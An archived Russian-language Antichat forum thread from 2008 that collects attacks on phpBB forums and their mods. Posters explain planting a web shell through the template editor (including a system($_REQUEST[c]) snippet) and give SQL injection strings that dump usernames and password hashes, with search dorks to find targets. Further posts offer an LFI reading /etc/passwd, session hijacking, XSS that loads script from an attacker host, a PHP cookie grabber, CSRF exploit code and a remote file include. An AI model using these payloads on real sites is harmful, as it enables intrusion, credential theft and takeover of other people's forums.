ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Заливка шелла - eXtreme Styles |

08.03.2008, 02:37
|
|
Новичок
Регистрация: 27.06.2007
Сообщений: 3
Провел на форуме: 12730
Репутация:
3
|
|
Заливка шелла - eXtreme Styles
Я еще не видел такого метода заливки шелла, как использование eXtreme Styles
(*требуется доступ в админку)
Версии: Точно сказать не могу, но 2.0.21-22 поддерживают
Метод:
eXtreme Styles -> Styles Management -> [edit templates]
После этого можно при помощи встроенного(!) редактора файлов вставить необходимый код в страницу
Мой любимый файл attach_rules.php
Им редко кто пользуется, а после заливки туда, можно создать и свой файл
Подробнее:
Все просто, если есть доступ к админке и версия использует "eXtreme Styles"
*я описываю так как есть в доступной мне админке
Ищешь в левом столбце eXtreme Styles, под ним Styles Management, по этой ссылке кликаешь и в правом фрейме смотришь [edit templates], его кликаешь, и попадаешь в интуитивно понятный редактор файлов в forum_root папке, начинаешь естественно(так как это редактор стилей) в папке templates, выходишь на уровень выше, ищешь нужный файл
(для дефейса index.php, для заливки шелла, к примеру, attach_rules.php)
И кликаешь по нему, редактишь его, как надо, т.е. дописываешь в него код шелла(я советую rst-шелл, хоть большой, но качественный, правда АВниками палится)
Потом давишь кнопку отправить(послать, send и тп.)и выбираешь не ФТП метод, а локалсистем, или как то так... и все, прехеходишь по неообходимой тебе ссылке, и видишь свой(или чужой шелл)
___________________________________________
помог? прибавь к репутации
Последний раз редактировалось Elekt; 03.09.2008 в 01:11..
|
|
|

08.03.2008, 03:10
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме: 500748
Репутация:
137
|
|
Passive XSS 2.0.22
1) Пассивная XSS: нефильтруется переменная cur_password при замене пароля
2) Opencosmo Security
http://www.opencosmo.com
Author: Alfredo Panzera, Opencosmo Security
Vendor: phpBB.com
Version: 2.0.22
Exploit:
Go to http://[website]/forum/admin/admin_groups.php and into 'Group description:' insert your XSS.
3) PhpBB [profile.php] Permanent Xss Vulnerability
Sep 20 2007 04:35PM
Found By Seph1roth
[POST METHOD]
Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info
Bugged Variable: "selfdes" (Campo "Altre informazioni")
Xss: </textarea>[XSS STRING]
Последний раз редактировалось Elekt; 03.09.2008 в 01:09..
|
|
|

13.03.2008, 18:48
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
SQL Injection
Vulnerable: [phpBB MOD] FileBase
Exploit:
Код:
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
Dork:
Код:
inurl:"filebase.php" "Powered by phpBB
SQL Injection
Vulnerable: Fully Modded phpBB (kb.php)
Exploit:
Код:
kb.php?mode=article&k=1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Dork:
Код:
allinurl :kb.php?mode=article&k
article&k=
"Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
|
|
|
phpBB 2.0.23 Session Hijacking |

20.03.2008, 15:52
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
phpBB 2.0.23 Session Hijacking
Session Hijacking
Vulnerable: phpBB 2.0.23
PoC:
Когда модератор или администратор форума phpBB 2.0.X закрывает тему, его sessionid отправляется GET'ом:
Код:
http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=[session]
Администратор/модератор должен быть перенаправлен на некую тему атакующего.
Если атакующий разместил в своем посте изображение, то он может видеть referer и тем самым sessionid. И если администратор(модератор) закрывает данную тему, то атакующий получает его sessionid, которую но может использовать для дальнейших атак типа Cross Site Request Forgery
============
Elekt:
В случае запрета [img] можно заюзать удаленную аватарку 
============
Автор: NBBN
Последний раз редактировалось Elekt; 03.09.2008 в 01:36..
|
|
|
Заливка шела через темплейты в phpBB3(необходим доступ в админку) |

26.03.2008, 03:44
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме: 3372120
Репутация:
2565
|
|
Заливка шела через темплейты в phpBB3(необходим доступ в админку)
Заливка шела через темплейты в phpBB3(необходим доступ в админку).
1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:
Код:
<!-- PHP -->
system($_REQUEST[c]);
<!-- ENDPHP -->
Последний раз редактировалось Elekt; 03.09.2008 в 01:08..
|
|
|
phpBB PJIRC mod local file inclusion |

27.03.2008, 20:04
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
phpBB PJIRC mod local file inclusion
LFI
Vulnerable: phpBB PJIRC mod
Vuln script:
Код:
./irc.php:31 include($php_root_path. 'common.' .$phpEx);
PoC:
Код:
http://target.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd
© 0in from DaRk-CodeRs
Последний раз редактировалось iddqd; 27.03.2008 в 20:26..
|
|
|
XSS Private Messagging в Phpbb3 |

29.03.2008, 14:38
|
|
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме: 3509350
Репутация:
412
|
|
XSS Private Messagging в Phpbb3
XSS Private Messagging On PhpBB3
http://www.victimesite.org/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=[page]
Where is:
[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
[page] = Page of your PM
Redirect Code [Ascii --> Hex]:
[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(<script src=http://www.evilsite.org/WaRWolFz/file.js>)
COOKIES GRABBER
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);
?>
© By Dante90 .
Последний раз редактировалось Mo4x; 29.03.2008 в 14:48..
|
|
|
PhpBB <= 2.0.22 CSRF Add User In Group |

21.05.2008, 22:11
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме: 4839935
Репутация:
1202
|
|
PhpBB <= 2.0.22 CSRF Add User In Group
PhpBB <= 2.0.22 CSRF Add User In Group
www.hackinginside.altervista.org
Author: Vincy
Email: djvincy@hotmail.it
This CSRF add an user in a group.
Html Exploit By Vincy:
Код HTML:
<html>
<iframe name="hackinginside" frameborder="0" height="0" width="0"></iframe>
<form action="http://site.com/path/groupcp.php?g=[GROUP_ID]" method="post" name="vincy" target="hackinginside">
<input type="hidden" name="username" value="[YOUR_NAME]">
<input type="submit" name="add" value="Add Member"></form>
<script>document.vincy.submit()</script>
</html>
Flash Exploit By Nexen:
PHP код:
var username:String = "[YOUR_NAME]";
var add:String = "Add Member";
var g:String = "[GROUP_ID]";
getURL("http://site.com/path/groupcp.php?g=[GROUP_ID]", "_self", "POST");
|
|
|
phpRaider phpbb3 Bridge 'phpbb3.functions.php Remote File Include Vulnerability |

27.05.2008, 00:02
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме: 4839935
Репутация:
1202
|
|
phpRaider phpbb3 Bridge 'phpbb3.functions.php Remote File Include Vulnerability
phpRaider phpbb3 Bridge 'phpbb3.functions.php' Remote File Include Vulnerability
http://securityfocus.com
An attacker can exploit this issue via a browser.
Exploit:
http://www.example.com/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.example2.com/s.php
|
|
|

08.06.2008, 15:21
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
уязвимость в сal_lite
уязвимость в сal_lite
Код:
cal_lite.php?id=12&mode=display&cl_d=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Последний раз редактировалось Elekt; 03.09.2008 в 01:10..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|